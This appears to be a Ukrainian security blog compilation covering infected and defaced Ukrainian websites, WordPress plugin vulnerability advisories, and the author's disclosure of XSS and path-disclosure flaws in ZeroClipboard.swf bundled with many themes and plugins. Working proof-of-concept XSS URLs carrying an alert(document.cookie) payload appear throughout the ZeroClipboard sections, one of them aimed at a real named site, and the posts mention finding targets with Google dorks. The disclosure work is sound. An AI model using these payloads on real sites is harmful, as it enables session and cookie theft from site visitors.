Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://sarepta.com.ua - інфекція була виявлена 13.03.2013. Зараз сайт входить до переліку підозрілих.
• http://catalog.biz.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://ivanenko.zp.ua - інфекція була виявлена 18.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://bereginya.zp.ua - інфекція була виявлена 09.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://swiftprint.com.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Terillion Reviews та Count Per Day. Для котрих з’явилися експлоіти. Terillion Reviews - це плагін для розміщення оглядів на сайті, Count Per Day - це плагін для ведення статистики відвідувань.

• Stored XSS in Terillion Reviews Wordpress Plugin (деталі)
• WordPress Counter Per Day 3.2.3 DoS / Path Disclosure (деталі)
• WordPress Count-Per-Day 3.2.5 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Інформую вас про останні оновлення на сайті, що були зроблені останнім часом.

Як я вже писав в своїй статті, в лютому я розмістив програму для перевірки обходу фільтрів для проведення XSS атак в розділі Обхід XSS фільтрів. Де ви можете перевірити веб браузери, щоб вияснити які символи вони підтримують для проведення XSS атак.

А в березні я оновив SQL Injection ASCII Encoder. Додав підтримку наступних СУБД: IBM DB2, Postgres SQL і MS Access.

У лютому, 20.02.2013, я знайшов Cross-Site Scripting та Full path disclosure уразливості в темах до WordPress, що містять ZeroClipboard.swf. Також знайшов одну тему, що містить і ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard та про численні вразливі веб додатки з цією флешкою. Як я зазначав, це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в сотнях веб додатків.

Також вона міститься потенційно в сотнях плагінів для WordPress, про що я писав. А також в сотнях тем (шаблонів) для WordPress, включаючи теми зроблені на замовлення окремих сайтів. Серед них Montezuma, Striking, Couponpress, Azolla та Black and White. Та існує багато інших уразливих тем до WordPress з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

http://site/wp-content/themes/montezuma/admin/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/striking/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/couponpress/template_couponpress/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/azolla/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://site/wp-content/themes/black-and-white/framework/admin/assets/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Це дуже поширена флешка. Якщо при стандартному пошуку через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf, то при пошуку по темах для WordPress можна знайти майже сто тисяч сайтів з цими флешками.

Full path disclosure (WASC-13):

Також всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/montezuma/

http://site/wp-content/themes/striking/

http://site/wp-content/themes/couponpress/

http://site/wp-content/themes/azolla/

http://site/wp-content/themes/black-and-white/

Вразливі наступні веб додатки з флешкою (всі версії даних тем для WP): Montezuma, Striking, Couponpress, Azolla, Black and White.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Responsive Logo Slideshow, Pretty Link та Comment Rating. Для котрих з’явилися експлоіти. Responsive Logo Slideshow - це плагін для створення слайдшоу, Pretty Link - це плагін для розміщення гарних лінок, Comment Rating - це плагін для створення рейтингів коментарів.

• Reflective/Stored XSS in Responsive Logo Slideshow Plugin Cross-Site Scripting Vulnerability (деталі)
• WordPress Pretty Link 1.6.3 Cross Site Scripting (деталі)
• WordPress Comment Rating 2.9.32 SQL Injection / Bypass (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.vynogradiv-rda.gov.ua (хакером Sejeal) - 23.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.dak.gov.ua (хакером Sejeal) - 23.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ddacore.com (хакером misafir) - 15.01.2013, зараз сайт вже виправлений адмінами
• http://vsesvitn.com.ua (хакером Hmei7) - 12.03.2013, зараз сайт вже виправлений адмінами
• http://volleyball.in.ua (хакером Sejeal) - 15.01.2013, зараз сайт вже виправлений адмінами
• http://pms-carmedia.com (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://volleyballinua.s24.yourdomain.com.ua (хакером ghost-dz) - 17.02.2013, зараз сайт вже виправлений адмінами
• http://24kadra.pp.ua (хакером Aghilas)
• http://www.noomd-pi.org (хакером Ardd’zz)
• http://www.slava-hotel.com.ua (хакерами з Kosova Warriors Group) - 04.03.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://dynamomania.com - інфекція була виявлена 28.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://gothic.com.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://gloriamed.com.ua - інфекція була виявлена 09.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://mdpu.org.ua - інфекція була виявлена 06.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://profcom.kiev.ua - інфекція була виявлена 07.03.2013. Зараз сайт входить до переліку підозрілих.
• http://melitopolonline.net - інфекція була виявлена 05.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://avk7.com.ua - інфекція була виявлена 05.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://allindustry.com.ua - інфекція була виявлена 25.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://misto.zp.ua - інфекція була виявлена 20.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://rusfight.pp.ua - інфекція була виявлена 18.02.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Audio Player, WP-Table Reloaded та Marekkis Watermark. Для котрих з’явилися експлоіти. Audio Player - це флеш аудіо плеєр, WP-Table Reloaded - це плагін для розміщення таблиць, Marekkis Watermark - це плагін для розміщення водяних знаків на зображення.

• Wordpress Audio Player Plugin XSS in SWF (деталі)
• WordPress WP-Table-Reloaded Cross Site Scripting (деталі)
• WordPress Marekkis Watermark Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в плагінах до WordPress, що містять ZeroClipboard.swf. Деякі плагіни також містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard та про численні вразливі веб додатки з цією флешкою. Як я зазначав, це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в сотнях веб додатків.

Також вона міститься потенційно в сотнях плагінів для WordPress. Серед них Flash Gallery, Slidedeck2, WPClone, PayPal Digital Goods powered by Cleeng і Cleeng Content Monetization. Та існує багато інших уразливих плагінів до WordPress з ZeroClipboard. Як я зазначав у першому записі, після публікації XSS дірки в плагіні WP-Table Reloaded я звернув увагу на уразливості в цій флешці. Після публікації трьох записів на тему ZeroClipboard в лютому, я зробив паузу (перед наступними публікаціями), а тим часом у березні один дослідник оприлюднив численні уразливі WordPress плагіни з цією флешкою. В цьому списку багато плагінів, але це не вичерпний список, я знаходив багато інших уразливих плагінів з ZeroClipboard (в тому числі навів такі нижче).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

1 Flash Gallery:

http://site/wp-content/plugins/1-flash-gallery/swf/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Slidedeck2 (всі Lite, Personal та Pro версії):

Папка плагіна може називитися slidedeck2, slidedeck-2.0, slidedeck2-personal та slidedeck2-pro. Містить файли ZeroClipboard.swf та ZeroClipboard10.swf.

http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

WPClone:

http://site/wp-content/plugins/wpclone/lib/js/ZeroClipboard.swf?i?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

PayPal Digital Goods powered by Cleeng:

http://site/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Cleeng Content Monetization:

http://www.drchloecarmichael.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Це дуже поширена флешка. Якщо при стандартному пошуку через Гугл дорки можна знайти десятки тисяч сайтів з ZeroClipboard.swf чи ZeroClipboard10.swf, то при пошуку по плагінам для WordPress можна знайти сотні тисяч сайтів з цими флешками.

Вразливі наступні веб додатки з флешкою (всі версії, перевірялося в зазначених версіях): Flash Gallery 1.7.2, Slidedeck2 (всі Lite, Personal та Pro версії, виправлено в версії 2.1.20130306), WPClone 2.0.6, PayPal Digital Goods powered by Cleeng 2.2.4, Cleeng Content Monetization 2.3.2.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://darg.gov.ua (хакером misafir) - 15.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://boguslav-rda.gov.ua (хакером Hmei7) - 16.01.2013 - похаканий державний сайт, на сайті все ще розміщений файл хакера
• http://www.upszn.gov.ua (хакером misafir) - 20.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.in.cv.ua (хакерами з Kosova Warriors Group) - 23.02.2013, зараз сайт вже виправлений адмінами
• http://casamia.dp.ua (хакером Hmei7) - 12.03.2013, на сайті все ще розміщений файл хакера

Сайт casamia.dp.ua розміщений на сервері HostPro, де раніше вже відбувся масовий взлом сайтів.